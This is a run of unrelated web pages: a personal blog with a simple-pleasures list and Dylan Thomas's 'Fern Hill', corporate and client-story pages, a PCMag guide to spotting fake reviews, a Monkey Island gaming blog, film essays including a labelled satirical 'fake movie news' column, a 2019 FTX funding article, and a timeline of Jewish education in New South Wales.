My Yorkshire compatriot, Lord Cliff of Richmond architect of the imaginatively titled but now defunct blog, “Cliff’s Column”, recently ran a post - like a meme - in which he listed “Ten Simple Pleasures”. This was such a nice idea, I have borrowed it and here are mine…
1. Eating a traditional Sunday dinner round the table with my family – roast beef, new potatoes, roasted leeks, fresh peas and carrots with gravy, horseradish sauce and of course Yorkshire pudding – Yes ladies you can eat Yorkshire pudding!
2. Lying on my back in the garden watching summer swallows dancing under the clouds.
3. A lovely clear and well-kept pint of draught Tetley’s bitter with a half inch head that leaves foamy drinking lines down the inside of the glass.
4. Picking up my guitar and revisiting songs, forever amazed that my fingers, my voice box and my mind are capable of such artistry.
5. Visiting the old graveyard near the former site of St Faith’s church, west of Leven, East Yorkshire – I don’t know why but this place continues to hold special significance for me. The silence. The mystery.
6. Burying myself in a good book in times where responsibilities and schedules don’t intrude and spoil the connection.
7. Pottering around in the garden in shorts and flip flops, clipping sycamore shoots, briars and bramble runners.
8. Seeing a starry sky on a dark, dark night with no urban light pollution. Amazing!
9. Clean linen sheets that smell of the outdoors and welcome you to sleep.
10. The slightly metallic smell of the air when rain has fallen after a dry spell.
"Spellbound"
Here's a poem I want to share with you in which words are like music. The core "meaning" seems to me to surround the lost world of childhood - a golden time that's gone forever but more important is the delicious harmonies of the language - as if the poet - Dylan Thomas - was inebriated with words, rolling them round on his tongue, enjoying the feel of them, celebrating man's connections with nature.
Fern Hill by Dylan Thomas
Now as I was young and easy under the apple boughs
About the lilting house and happy as the grass was green,
The night above the dingle starry,
Time let me hail and climb
Golden in the heydays of his eyes,
And honoured among wagons I was prince of the apple towns
And once below a time I lordly had the trees and leaves
Trail with daisies and barley
Down the rivers of the windfall light.
And as I was green and carefree, famous among the barns
About the happy yard and singing as the farm was home,
In the sun that is young once only,
Time let me play and be
Golden in the mercy of his means,
And green and golden I was huntsman and herdsman, the calves
Sang to my horn, the foxes on the hills barked clear and cold,
And the sabbath rang slowly
In the pebbles of the holy streams.
All the sun long it was running, it was lovely, the hay
Fields high as the house, the tunes from the chimneys, it was air
And playing, lovely and watery
And fire green as grass.
And nightly under the simple stars
As I rode to sleep the owls were bearing the farm away,
All the moon long I heard, blessed among stables, the nightjars
Flying with the ricks, and the horses
Flashing into the dark.
And then to awake, and the farm, like a wanderer white
With the dew, come back, the cock on his shoulder: it was all
Shining, it was Adam and maiden,
The sky gathered again
And the sun grew round that very day.
So it must have been after the birth of the simple light
In the first, spinning place, the spellbound horses walking warm
Out of the whinnying green stable
On to the fields of praise.
And honoured among foxes and pheasants by the gay house
Under the new made clouds and happy as the heart was long,
In the sun born over and over,
I ran my heedless ways,
My wishes raced through the house high hay
And nothing I cared, at my sky blue trades, that time allows
In all his tuneful turning so few and such morning songs
Before the children green and golden
Follow him out of grace.
Nothing I cared, in the lamb white days, that time would take me
Up to the swallow thronged loft by the shadow of my hand,
In the moon that is always rising,
Nor that riding to sleep
I should hear him fly with the high fields
And wake to the farm forever fled from the childless land.
Oh as I was young and easy in the mercy of his means,
Time held me green and dying
Though I sang in my chains like the sea.
Like the American Dylan, this Dylan has always meant a lot to me. I have visited the village that became his adopted home in South Wales - Laugharne - many times. I once put flowers on his grave - a simple white wooden cross in Laugharne churchyard and I have drunk in Brown's Hotel and walked the paths that he walked. Sadly when you search for images of him on the web, he never comes back smiling or laughing - as if his word wrestling and poetic craftsmanship left him drained and morose, not quite in tune with the real world that most of us occupy... "though" he "sang in" his "chains like the sea".
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(Chinese) 中文
Water Resources Engineering
Traffic & Transport Engineering
Design Panel
New Directors Appointed to the Beveridge Williams Board
Beveridge Williams is proud to announce the appointment of two new Executive Directors, Mark Fleming and Andrew Busse, to our Board. Andrew is the Manager of Survey Melbourne and Mark is the Manager of Engineering. These additional directors bring a wealth of experience and expertise and we look forward to them helping grow and develop the company.
Andrew Busse grew up in Cape Town, South Africa. He graduated from at the University of Cape Town in 1988 with a surveying degree. In 1997, on his arrival in Melbourne, he joined Beveridge Williams. He currently manages a surveying team of 43 in Melbourne. Mark grew up in Melbourne and studied civil engineering at RMIT. After positions in private companies and local governamnet , Mark joined Beveridge Williams in 2011 and became manager a year later. He has been an integral part of the incredible growth of the engineering team and now has the responsibility for over 70 professional staff. The Board of Beveridge Williams is looking forward to the next chapter in the growth and development of the company with these two well renowned professionals playing an integral role in shaping our future.
Corporate Tree planting day
New collaboration with Vicinity Centres
In October 2019, staff from Beveridge Williams planted 3,000 trees, shrubs and grasses along the banks of Archie’s Creek in Ryanston (near Wonthaggi).
Beveridge Williams has just registered its first Reconciliation Action Plan with Reconciliation Australia.
Beveridge Williams has been awarded a three-year, nation-wide contract to conduct loading dock safety audits for shopping centres managed by Vicinity Centres. Vicinity Centres is one of Australia’s leading retail property groups
Award Winning Development and Infrastructure Consultants
Beveridge Williams brings you an expert team of award-winning land development, infrastructure and built environment consultants.
1 Glenferrie Road
(PO Box 61)
Email: melbourne@bevwill.com.au
Quality, Safety & Environment
Beveridge Williams is proud to have established a reputation as a safe and reputable Development and Environment Consultant.
© 2019 Beveridge Williams & Co, Melbourne, Victoria
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Client story Gain Real-Time Reporting for On-Site Operations
FMG wanted to achieve near real-time views on how operations are tracking against production plans for supervisors in and around the remote mining pits. Insight Digital Innovation team created the SIC decision support system and series of BI dashboards to provide the intuitive dashboards for quicker time to data and insights.
By Insight Editor / 20 Nov 2018 / Topics: Mobility Virtualization Cloud
Client industry:
The client looked achieve near real-time data and insights on how operations are tracking against production plans for supervisors in and around the remote mining pits.
SIC decision support system
Series of sophisticated business intelligence dashboards delivered on tablet devices
Intuitive visual dashboards with rich data
Quicker time to data and insights
Estimated $30 million in annual cost savings
Solution area:
Insight’s Digital Innovation solutions help clients digitally transform their business operations to remain competitive.
The concept and the challenge
How informed decision making is saving millions of dollars
Fortescue Metals Group, the world’s fourth largest iron ore producer, had a problem – a lack of real-time data and insights for the supervisors in the field. In a mining production environment, an efficiency gain of 1% can mean millions of dollars for the bottom line. As a company committed to driving productivity improvements, Fortescue asked Insight to pursue a ambitious goal of providing the most up-to-date data for the company, and getting the data out of the control room and into the field. So we rose to the challenge, by creating reporting tools to on-site field operators via mobile devices at the iron ore mines, giving the team a near real-time view of how operations are tracking against production plans and allowing supervisors to be in and around the mining pits.
Today, thanks to our software, Fortescue is generating an estimated $30 million in annual cost savings. In 2014, the team was presented the Gartner Business Process Management Excellence Award for the Short Interval Control (SIC) project.
A real-time, mobile solution
Insight partnered with Fortescue to deliver the SIC decision support system, which provides real-time reporting tools to on-site mining supervisors that show how operations are tracking against production plans, via a series of sophisticated business intelligence dashboards. And it’s all delivered to Windows-based tablet devices.
"Feeds of data are pulled together from fleet management systems that track trucks, diggers and other mining equipment, as well as the SCADA systems that control and monitor fixed plant."
Previously, supervisors had to wait up to 12 hours to receive progress reports, generated manually at the end of each shift, to gauge the day’s productivity. The data is now at the supervisors’ fingertips – presented as either intuitive visual dashboards or as rich data.
“The ability to measure the adherence to plan during the shift has improved the way Fortescue works,” explains Nick Owen, IT Business Manager at Fortescue Metals Group. “Previously, it was very difficult to measure against targets during a shift, with the information not visible until the next day. Giving supervisors access to the data in near real-time helps them to make informed decisions, quickly engage with mine control and have a better understanding of available options.”
Another great outcome
Created in sprints, designed to last the distance
The original project was delivered using an agile delivery approach, working in three-week sprints.
Following the successful first phase of the SIC project, Fortescue continued to work with the Insight team to expand on the SIC dashboarding capabilities, with successful implementations across the Solomon and Cloudbreak mine sites.
"Insight brought real-time dashboard reporting to the Ore Processing Facilities (OPFs) at the Cloudbreak, Solomon and Christmas Creek mine sites."
In addition to the SIC reports and mobile dashboards, Insight brought real-time dashboard reporting to the Ore Processing Facilities (OPFs) at the Cloudbreak, Solomon and Christmas Creek mine sites, along with near real-time dashboards for rail and port operations. These dashboards complement the SIC reports and have allowed the business to track production rates against daily targets, and their investment in mobile devices for its staff enabled the SIC project to reach more employees across many remote locations.
Be a real-time business. Consider a modern data platform to leverage the right tools to gain data-driven insights.
All keyword categories: Client story Digital Innovation Microsoft Mobility Virtualization Cloud Manufacturing Cloud + Data Center Transformation
Security in the modern workplace Infographic / 13 Nov 2019
Surface - The Best Expression of Microsoft 365 Listicle / 17 Oct 2019
Trusted secure cloud sets the stage for VenuesWest’s Digital Transformation Client story / 11 Sep 2019
Digital Student Management system on Azure supporting 465,000 students Client story / 11 Sep 2019
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PCMag Australia | How-To | Slideshow
How To Spot A Fake Review On Amazon How to Spot a Fake Review
How To Spot A Fake Review On Amazon
Amazon and other e-commerce websites are flooded with bogus reviews. These online tools will help you identify a fake review on the internet.
Jason Cohen
As wonderful as the internet can be, it also lies to us every day. Fake news has flooded social media channels, digital media, and even the websites we shop on. Fake reviews—seemingly legitimate reviews created by the seller or someone paid by them—are becoming harder to spot these days.
Why is this bad? In a world where we are making an increasingly large amount of purchases online, and likely spending less time making purchase decisions, people are being taken advantage of. Fake reviews are leading people astray with false information, unreliable five-star reviews, and inflated aggregate ratings. If you’re not careful, these reviews can misrepresent what you are buying and end up costing you serious money.
The good news is that there are solutions. Though Amazon and other e-commerce sites have been hesitant to wade into these reviews, others have rushed in to do the work for them. Just like we have tools to spot fake news, we also have a few ways to identify fake reviews on the internet. Here’s how to tell the difference, get rid of them, and report them.
How to Spot a Fake Review
It’s important to understand how to tell a bogus review from the real thing. While it may be easy to simply look at the aggregate rating, our advice is to take some time and read a few reviews—both positive and negative. Once you settle in and read up, you should be able to tell which reviews are unreliable.
Be on the lookout for overly positive or overly negative reviews that don’t offer enough detail. Look for any review with a very different experience from the overall consensus, or if a reviewer goes into too much detail about an alternative product.
You should also be wary of one-word or one-sentence five-star and one-star reviews. If a bunch of them are posted around the same time, they're likely unreliable.
Amazon added a Verified Purchase label that accompanies legitimate reviews to combat fake reviews. This will tell you that Amazon could confirm the reviewer actually purchased the item they are reviewing.
How to Report a Fake Review
If you happen across a review you believe is fake, you can report it to the e-commerce website and mark it for investigation and possible removal.
Amazon, Best Buy, and Walmart make it easy by asking you to click the report/flag button next to the review. However, this simple system doesn't allow for depth or context.
Steam, on the other hand, allows you to write a message. Just click on the review's Recommended/Not Recommended banner to view the full review. Click the flag icon and enter your message.
Other websites require you to log into an account before you can do anything about a particular review. You must sign into your Yelp account before a report option is even made available on the platform. Meanwhile, TripAdvisor will let you start a report, but you must sign in with your email, Facebook, or Google account to see it through.
Sites like Ebay and Facebook Marketplace allow you to report sellers, but there are currently no ways to flag a review as fake. Some websites don't even provide clear ways to report abuse of any kind.
Fakespot
The online tool Fakespot rates how reliable product pages are on Amazon, Best Buy, Google, Sephora, Steam, TripAdvisor, Walmart, and Yelp. Fakespot’s algorithm looks at both review and reviewer, analyzing language, previous reviews, and purchase history to determine trustworthiness.
Just copy the URL of the page in question and paste it onto the Fakespot website and it will investigate the link. Once it's done, Fakespot spits out a grade that should tell you whether the page has reliable information.
It also filters out reviews considered fake in order to create a more reliable product rating. This grade won’t tell you if the product in question is actually good or bad, but it will allow you to make a more informed decision.
Extensions for Chrome, Firefox, and Safari allow online shoppers to analyze a webpage with the push of a button. Fakespot is also available as an app for iOS and Android, where pages can be shared through a web browser directly to the app for analysis.
ReviewMeta
Another tool, called ReviewMeta, works pretty much the same way as FakeSpot, but it simplifies the grading process as an Amazon-only analyzer. Like with Fakespot, you copy and paste the URL in question, but in this case ReviewMeta does not hand out a grade for the webpage. Instead, it eliminates the reviews it deems unreliable and replaces Amazon’s aggregate rating with one from ReviewMeta.
This tool offers the unique ability to the tweak ReviewMeta's algorithm. After the website analyzes a page, you can go into the grading mechanics and adjust how categories are weighted. The site also provides detailed breakdowns—complete with graphs—for the factors contributing to the adjusted rating.
Add the browser extension for Chrome, Firefox, Safari, or Edge to quickly analyze a webpage and receive a Warn/Pass/Fail grading depending on the results. A mobile app for iOS and Android also exists to help analyze pages from your phone.
The Review Index
The Review Index is an online tool focused on aggregating tech product ratings on Amazon and Steam, but it can still determine if a product's score has been boosted by fake reviews. There are Chrome and Firefox extensions that make the process easier.
Paste the URL into the site and The Review Index breaks the product out into different categories based directly on the words it parsed from reviews. At the same time, The Review Index runs a spam test to ensure that the reviews are authentic, providing a Pass/Fail grade at the end.
Review Skeptic
Created by researchers at Cornell University, Review Skeptic works a little differently by using machine learning to identify fake hotel reviews. This is a simple online tool that will give you a quick true or false indicator when you pop a URL into the website. Review Skeptic claims it has achieved 90 percent accuracy.
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Jason Cohen jason_cohen@pcmag.com
Jason has been writing and editing professionally since graduating from University of Maryland, College Park in 2010. He has previously served as a technical writer for a government contractor and a copywriter with a digital advertising agency, where he wrote about marketing and tech. Most recently, he was writing about the New York Yankees for SB Nation and comic books for Comic Book Resources as a full-time freelance writer and editor. See Full Bio
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Secret of Monkey Island: A noob walks into a pirate bar
February 20, 2019 February 11, 2019 Syp
(This is part of my journey going playing through 1990’s Secret of Monkey Island. You can follow the entire series on the Retro Gaming page.)
While I was mulling my options over for a new retro gaming series, I ended up watching a video on LucasArts’ Monkey Island series and being reminded of how great it was. Actually, I was reminded of how much I liked it and yet had to completely play through the main four games in the series. All too quickly, I felt the call of the sea and the puns dragging me down into a loader screen and this here post!
Even though I’ve played through the first game and parts of the second and third, I would love to do this entire series start to finish while writing about it. We’ll kick things off with 1990’s The Secret of Monkey Island, which was remade in 2009 with better graphics and voice acting. All of it is based on Disney’s Pirates of the Caribbean ride, which is one of my all-time favorite amusement park experiences, so I’m all for soaking up that atmosphere.
In any case, let’s dig into this farcical series about a wanna-be pirate, a world set out to frustrate him, and an island that contains many secretive monkeys. Who’s with me?
From the get-go, I have an agonizing decision to make: original flavor monkey or special edition monkey? Both have virtues in my book. I like the pixel art of the original, which looks stunningly good for 1990, and the remake’s graphics can border on looking a little flat and flash-like. On the other hand, the remake features better mouse controls and the addition of pretty well-done voice acting.
At least I don’t have to choose for good — this game actually lets you instantly swap versions on the fly with the F10 key. I think I’ll play the special edition primarily while swapping over to see what the original screens looked like. I’ll probably be showing screens from both, so go with me here.
Anyway, meet Guybrush Threepwood, a man who appears out of nowhere to talk to a guy on a cliff about his (Guybrush’s) deep desire to become a pirate. Turns out that this isn’t as easy a prospect as one might hope, as Guybrush will need to apply and undergo three trials just to make it. Who thought buccaneers were so discerning and exclusive?
First stop, the SCUMM Bar (SCUMM was the game’s engine that powered a lot of LucasArts’ adventure titles). I love the happy smiling face in the title there. And speaking of LucasArts, one of the things I’ve always liked about these adventure games versus Sierra is their decision not to put death traps everywhere. I don’t even think it’s possible to die in this game, although you can get stuck trying to get past an obstacle or puzzle. While I love a funny death screen, I appreciate the “no deaths” design because it encourages me to explore and experiment more.
For example, the SCUMM Bar is pretty entertaining to visit, especially as I talk to the various pirates around the tavern. Aside from some blatant fourth wall-breaking talks (not to mention a pitch for a LucasArts game few people actually remember), there’s some vital background information on what’s been happening on and around Melee Island here.
Turns out that a fearsome pirate named LeChuck fell in love with the island’s governor, Gov. Marley, and went on a quest to find the Secret of Monkey Island to impress her. He died, came back somehow, and now he’s terrorizing the seas and nobody wants to sail out there. Hence the packed bar.
My enjoyment of this series is derived from two factors. First, Guybrush is a very likable and affable character. He’s sincere and earnest while playing a funny straight man to the lunacy around him. I genuinely wanted him to succeed.
But past that, the second factor is that Monkey Island is enjoyable in the moment-to-moment. It’s hilarious to talk to everyone, including the dog (with whom you can hold a surprisingly long conversation). Even though there is a story to progress through, the descriptions, actions, and conversations in each section are a lot of fun to behold.
Guybrush’s quest to become a pirate leads him here, to the three Important-Looking Pirates that apparently serve as the gatekeepers to all piratedom. They tell Guybrush that he can join up if he completes the three trials — that is, proving himself successful at swordplay, thieving, and treasure hunting. To do this, I’ll have to defeat the Sword Master, steal an idol from the governor’s mansion, and find the legendary lost treasure of Melee Island. I also find out what’s actually in grog, which ends up being a horrific list of ingredients including sulfuric acid, pepperoni, and red dye no.2.
Can I also say how much I adore this soundtrack? In both editions, it’s so soothing and perfect in striking that Caribbean pirate mood. Just an all-time classic and one of my favorite video game OSTs of all time.
There are lots of great environmental gags to notice as well, like the vat of poison (grog?). Oh, and the picture of the Pillsbury Doughboy. HE IS TOO ADORABLE FOR WORDS.
MEANWHILE IN HELL…
The ghost pirate LeChuck is informed by his laconic skeleton first mate that there’s a new pirate wannabe on Melee Island. Don’t know how the word of such an insignificant detail has gotten down here, but here we are. LeChuck mulls this over and vows to take care of it personally. After all, his plans are too important to be thwarted by a greenhorn such as Guybrush.
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9 thoughts on “Secret of Monkey Island: A noob walks into a pirate bar”
Shintar February 20, 2019 / 9:38 am
There is actually one way to die in Monkey Island… by drowning. It’s designed in such a way that it’s unlikely to be a problem for most people though.
I definitely also appreciated the lack of death penalty in MI and LucasArts’ other adventures going forward. I played the original Maniac Mansion and Zak McCracken too, and those had so many weird ways to die…
Jeromai February 20, 2019 / 11:41 am
I remember the “rubber tree” part so well. Such a sneaky jibe at Sierra games at the time, where walking a pixel too far in the wrong direction usually meant tumbling into a lake of acid, hurtling off a cliff, or otherwise dying in some new and unique fashion. (Hope you remembered to save a new game at practically every scene change!)
In the case of the first game, I think the pixel art original version is still a classic. The remastered art looks too abstract and cartoony. The vagueness of the detail adds to the player’s ability to project their own interpretations into the game and the characters. My Guybrush Threepwood would declaim his desire to be a mighty pirate in a way different from yours. A voice actor would make that experience too consistent. That works if the original already had voices like Grim Fandango, but not if it doesn’t. (Also, the Grim Fandango remaster was exceedingly faithful to the old version, very little changes visually.)
It’s like Final Fantasy 7. Part of its charm is the blocky models. If they ever get the remake out, it’ll look fantastically cinematic, I’m sure it’ll be a nice game experience, but it won’t have the nostalgic effect without the old aesthetic, baggage and all.
Syp February 20, 2019 / 11:57 am
Yeah I actually ended up sticking to the original pixel art in the second installment of this series (I’ve already written about five parts so far). Just feels better and the dialogue text is funny enough on its own.
Yeah you have to work hard to die in this game!
Xyzzy Sqrl February 20, 2019 / 12:45 pm
You don’t need to choose between classic and voice acting! SCUMMVM and the fandom can help with this problem.
http://www.gratissaugen.de/ultimatetalkies/monkey1.html
Gobsmacked February 20, 2019 / 1:03 pm
Yes, there is a way to die via drowning in one scene. However, since Guybrush can hold his breath for 10 minutes you need to sit around under water for over 10 minutes in real time.
Naithin February 20, 2019 / 5:52 pm
Oh man. The first two games in this series were really something. Right up there with Quest for Glory 1 & 2 as classics in my book. (Not sure what it is with 3 and 4 in a series that means I didn’t get on with them as well!)
I bought both the remakes of these, but uh.. Still need to go back and play them at some point. 😉
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Borders Line: Salute To The 80s Movie Hero
Today I would like to salute a character missing from modern comedies: the scrawny, surprisingly confident, smooth-talking 80s kid. I miss that kid. Where are our Ferris Buellers, our Marty McFlys, our Lloyd Doblers, our Duckies?
By Meredith Borders Apr. 14, 2011
There’s been a lot of talk lately about the loss of the great American superhero in film. Batman is Welsh. Superman and Spider-Man are British. Old Professor X is British. Young Professor X is Scottish. Thor and Wolverine are Australian. Green Lantern and Green Hornet are Canadian. Captain America, at least, is actually American.
Of course, we’ll always have Never Really Off-Duty Cop and Badass Hall of Famer John McClane, but I proudly claim another character as part of my American pop culture heritage, a character whom I would like to salute today: the scrawny, surprisingly confident, smooth-talking 80s kid. I miss that kid. Where are our Ferris Buellers, our Marty McFlys, our Lloyd Doblers, our Duckies? Where is that kid who remains casually indomitable in the face of high school hell, disapproving adults and disinterested girls? He’s not a superhero, but he’s superfluously charming and he lives a charmed life. He’s a little guy, but he’s fearless. Most importantly, he’s optimistic in the face of loserdom, and that unconquerable optimism is what saves him from being a loser.
He redefines coolness through a combination of quirky nonchalance and insuppressible joie de vivre. That boy turns loving life into pure, unadulterated art. He can transform one day of hooky into a car-cruising, parade-crashing, hot tub-chilling celebration of youth. He can fly on a skateboard. He turns designated driving into absolute magic. He befriends the bouncer who won’t let him in the club. His love of music makes him dauntless. He’ll kick over his amp and end “Johnny B. Goode” with a righteous solo in front of a room filled with silent, uncomfortable squares. He’ll make his way to the top of a parade float to serenade his best friend with “Twist and Shout.” He’ll lip-sync the shit out of “Try A Little Tenderness” to win over the love of his life. He’ll stand outside his crush’s bedroom window, blasting Peter Gabriel from a boombox that he holds earnestly above his head. That kid doesn’t shy away from being smitten. He would do anything for Jennifer, for Andie, for Sloane, for Diane. He makes himself ridiculous for her, and we love him for it.
What I admire most about that kid, however, is that he revels in being different. He’s easy to pick on because he wears bizarre clothes, he’s obsessed with kickboxing or his name’s fucking Duckie. He’s weird and he owns it. He’s not trying to fit in, and he couldn’t if he tried. What’s more, he stands up to that bastion of high school iniquity, the jock. He may be picked on, but he can never be bullied, because he transcends the coolness hierarchy to which most teens are slaves.
But with the descent of John Hughes, we have the ascent of Todd Phillips. Instead of Michael J. Fox, Matthew Broderick, John Cusack and Jon Cryer, we have Owen Wilson, Vince Vaughn, Bradley Cooper and Will Ferrell. These guys can be goofy, they can be charming, but what they ultimately represent are assholes. They’re the jocks of the movie, and what they lack in athletic prowess they make up for in obnoxious bullying. They mock and prank and disappoint, and then at the end of the movie they learn something and we’re supposed to believe that they’ve grown and they won’t be boorish little shits for the rest of their lives.
Devin said something in his post about Bradley Cooper in the remake of The Crow that got me thinking. He said that Cooper would be a villain in an 80s movie, and yet he’s a leading man today. Hell, most modern comedy protagonists would make perfect 80s movie villains. They play complete jerks. They humiliate their friends, they hurt their wives and girlfriends, they antagonize strangers and they make appalling decisions that result in catastrophe for their loved ones. In an 80s movie, these are the guys who would stroll up dressed in pastel sports coats and trip the hero as he walks down the hall, then guffaw and high five their buddies. Why the hell are we rooting for these people?
Thankfully we still have Jason Segel, Michael Cera, Jesse Eisenberg and Jay Baruchel to represent the harmless, nerdy, sweet percentage of the male comedy population. But what every single one of those guys is missing that separates him from his scrawny 80s counterpart is confidence. Joie de vivre. Charisma. The reason jackasses like The Hangover‘s Phil are taking over is that they possess all the glamour and moxie in their movies. Michael Cera is so squirrely, I kind of want to give him a wedgie myself. Can you imagine trying to bully Ferris? He’d exact an elaborate revenge scenario with the support of the entire student body, and he wouldn’t even take a break from making out with his insanely hot girlfriend to do it.
I would love to see that character in a modern comedy. I’d love to root for someone who isn’t a nerve-addled, milquetoast goober or an overgrown frat boy. Any suggestions to fill that vacuum in mainstream comedies today? I adore Jason Segel, but his shtick is 100% sadsack. I think Baruchel could do it with the right material. He was pretty charming and brave in Tropic Thunder, after all. I’ve always thought Topher Grace should be in more movies that aren’t Spider-Man 3. Most likely no one can fill Marty or Ferris’s shoes, but if we shot a little lower, who could be our next Duckie or Lloyd Dobler?
We Could All Die Tomorrow: This Trailer For GLORIA BELL Is So Great
THE OATH Review: Thanksgiving In The Time of The Purge
SXSW Review: NEVER GOIN’ BACK Loves Being Young And Wild
Meredith Borders Editorial Director
Meredith is the Editorial Director of BIRTH.MOVIES.DEATH. and the Alamo Drafthouse, and the Social Media Director for Fantastic Fest. She loves SMALLVILLE, and she's through apologizing for it.
By Jacob Knight, Nov 13, 2018
A romantic comedy with Julianne Moore and John Turturro? Yes, please (and thank you).
By Jacob Knight, Oct 12, 2018
Ike Barinholtz's directorial debut hosts a most uncomfortable holiday meal.
By Jacob Knight, Mar 17, 2018
All this hangout stoner comedy wants to do is pay the rent and head to the beach (yet both seem impossible).
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The Week In Fake Movie News: Oscar Edition
The world of the Oscars is severely shaken up this week.
By Evan Saathoff Nov. 14, 2011
This week in fake movie news...
*Brett Ratner scored a lot of points against the gay community this week by announcing that "rehearsing is for fags." This comments had many effects. For one, all men who identified themselves as fags were forced to examine their feelings on rehearsing. Those who found they weren't for it had to tell all their friends, family, and lovers that they were no longer fags.
Additionally, all directors who spend a great amount of time rehearsing before shoots were forced to examine their own sexuality and had to tell their friends, family, and lovers that they were now fags.
But the biggest fallout was reserved for Ratner himself, who was forced to quit his job as producer of this year's Oscars production due to a conflict between their strict rehearsal policy and Ratner's strict not a fag policy.
The Oscar production will now be produced by Brian Glazer, which means the telecast will have the hair of the first lesbian you ever met and the face of your youngest great-grandfather.
Eddie Murphy, Brett Ratner's handpicked host, has decided to walk away from his position as well. For those that don't know, Eddie Murphy is an actor who used to be a funny actor. Although the common assumption was that Murphy dropped out due to the loss of Ratner, the actor claimed that he'd been planning to quit since day one, and the timing was a mere coincidence. When asked why he'd want to give up the highly popular award show, he replied that the idea of people watching him in any capacity made him sick. These shakeups also had a negative effect of both Ratner and Murphy's film careers, as audiences angered by the duo made a unified decision to go one week back in time and not see their new film Tower Heist.
The Oscars will now be hosted by Harold and Kumar. Harold promises a good, clean show that doesn't run into overtime or offend anyone. Kumar nodded. But he kind of over-nodded, so many are assuming his nod was sarcastic, like how both of them nodded when asked if they respected rehearsals.
Meanwhile, Eddie Murphy is in talks to make a Beverly Hills Cop TV show starring Murphy as Axel Foley and Brett Ratner as Balki.
Other than all that, nothing much happened this week.
The Week In Fake Movie News: The TV Prequel Edition
The Week In Fake Movie News: Saved By the Bell
The Week In Fake Movie News: Breaking Dawn
the week in fake movie news
Evan Saathoff Senior Editor
Evan has been smartassing-up the Internet since 2008. His passions include dumb action movies, not-dumb action movies, Shakespeare, and Tyler Perry. While he claims to understand that people don't always get what they want, he nevertheless believes it would be “cool” if he could become more like Danny DeVito with age.
By Evan Saathoff, Jan 15, 2012
Will there be more Twilight? What scandal hit The Artist this week? Is The Dark Knight Rises a sure bet? All this and more in this week's edition!
By Evan Saathoff, Nov 27, 2011
News about AKIRA, THE EVIL DEAD, SKYFALL and the terrible tragedy at Bayside High School.
More news that wasn't, plus a guest review by film critic Almond Blight.
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Diana Ngo
Diana Ngo is a freelance fintech, blockchain news writer based in Ho Chi Minh City, Vietnam. She has worked for French- and English-language online publications covering disruptive technologies and innovative startups that are reinventing the financial services industry. She studied economics and international business at IAE of Lyon, in France, and holds a bachelor’s degree in Applied Economics from the Jean Moulin University Lyon 3.
Crypto Derivatives Trading Platform FTX Raises $8 Million
Investing ›
FTX, a new cryptocurrency derivatives exchange and trading platform, has raised $8 million in a funding round led by blockchain-focused fund Proof of Capital, Consensus Lab, FBG and Galois Capital.
Proof of Capital is a $50 million venture capital (VC) fund launched in April 2019 by partners from Horizons Ventures, Greylock Partners and 500 Startups, and backed by the likes of HTC and YouTube co-founder Steve Chen.
The fund invests in early-stage blockchain startups with a focus on fintech, infrastructure, hardware and consumer products, and made one investment prior to FTX in Ubanx, an API banking infrastructure for fiat-to-crypto exchange in Latin America.
Chris McCann, managing partner at Proof of Capital, said in a statement that his firm will help FTX go to market in Asia.
Developed by a team of former traders at Jane Street, Susquehanna and Optiver, FTX is a new crypto exchange and trading exchange offering futures contracts, leveraged tokens and an over-the-counter (OTC) portal. The platform promises to be “powerful enough for professional trading firms and intuitive enough for first-time users,” according to the company’s website, and claims more than $300 million in total trading volume since its launch.
FTX is currently expanding its team; it recently hired former employees of Huobi, Kraken and Circle, with more to come, Sam Bankman-Fried, co-founder and CEO of FTX Trading, wrote in a blog update on August 5, 2019.
It is now focusing on expanding its userbase and has started rolling out user acquisition strategies in Eastern Europe, Southeast Asia, Taiwan and Australia.
“We have some pretty badass team members from Jane Street, Optiver, Susquehanna, Google and Facebook but we’re planning to hire to grow the team, especially in Hong Kong,” Bankman-Fried told Bitcoin Magazine.
“Hong Kong is the financial hub of Asia so it will give us even more financial talent and fresh blood. We want to hire the best people from both traditional and decentralized financial institutions and expand our userbase globally. We are looking into hashrate futures and many other products to come.”
FTX’s origins trace back to 2017, when the team set out to build Alameda Research, a global trading platform which now claims to trade up to $1 billion per day and manage over $100 million in digital assets.
“Our CTO Gary Wang was tasked with writing an entire quantitative trading firm's software — from algorithms to front end UIs to trading systems to API connections — more or less autonomously. That software, combined with our experience at companies like Jane Street and Google, is what inspired FTX,” Bankman-Fried said. “We designed FTX for ourselves but as it evolved, we realized our platform has the potential to help other traders tap into derivatives and futures in a way that wasn't before possible.
Charting Bitcoin and Shitcoin Indices
According to Bankman-Fried, FTX’s biggest differentiator is that the platform focuses on making complex financial products more accessible to the average trader.
“It’s much of the reason we created investment vehicles like FTX BTC, a bitcoin futures product that lets traders speculate on the future price of bitcoin, and FTX SHIT, a ‘shitcoin’ index containing a basket of small-cap cryptocurrencies so traders can more effectively hedge risk and create new opportunities,” he said.
Shitcoin Index Perpetual Future (SHIT-PERP)
The company says its proprietary technology and trading features make the trading platform “one of the most liquid cryptocurrency exchanges in the market.”
FTX says its liquidation engine prevents clawbacks by slowly closing overleveraged positions while minimizing market impact, and its backstop liquidity provider system prevents accounts from going below bankruptcy level by automating liquidating and closing down at-risk accounts.
In addition to futures contracts, FTX offers three leveraged tokens for every underlying token or index listed on FTX: BULL (3x), BEAR (-3x) and HEDGE (-1x).
Each of these has an associated account on FTX that takes leveraged positions on the perpetual futures and can be created/redeemed for its share of the assets of that account. These tokens can be withdrawn from FTX as ERC-20 tokens.
Finally, FTX’s 24/7 OTC portal, powered by quant trading firm Alameda Research, allows investors to make OTC trades on over 20 coins with no fees and instant settlement.
The FTX ecosystem has its own native utility token, FTT, which provides holders with a number of benefits including weekly buying and burning of fees, lower trading fees, OTC rebates and collateral for futures trading.
bitcoin futuresconsensus labcrypto derivativesFTXHtcproof of capital
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Apply For Login
SRE – ‘Scripture’
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“ The History of Jewish Education in NSW is the saga of dedicated men and women working unselfishly and at times with great vision to pass on to the young the heritage of which they were so justly proud and which they considered to be the right of those generations that were to follow them “
Maurice H. Kellerman, OBE, 1979
TIMELINE OF JEWISH EDUCATION IN NEW SOUTH WALES
Prior to 1844 The first schoolmaster, Rev Moses Rintel, conducted the Sydney Jewish Academy.
1844 -1847 Jewish education was provided in family groups by private tutors.
1848 A Denominational School Board was established by the Government of NSW. Jewish schools including Zion House School were established.
1855 The first Jewish book published in Australia was Principles of Judaism by Rev M. R. Cohen, produced for the students of Zion House School.
1863 The Sydney Jewish Sabbath School was established by Rev Alexander B. Davis with 14 pupils. Enrolments increased in the first year to 81, with an average weekly attendance of 45 students.
1866 The Public Schools Act was passed and the Denominational School Board dissolved.
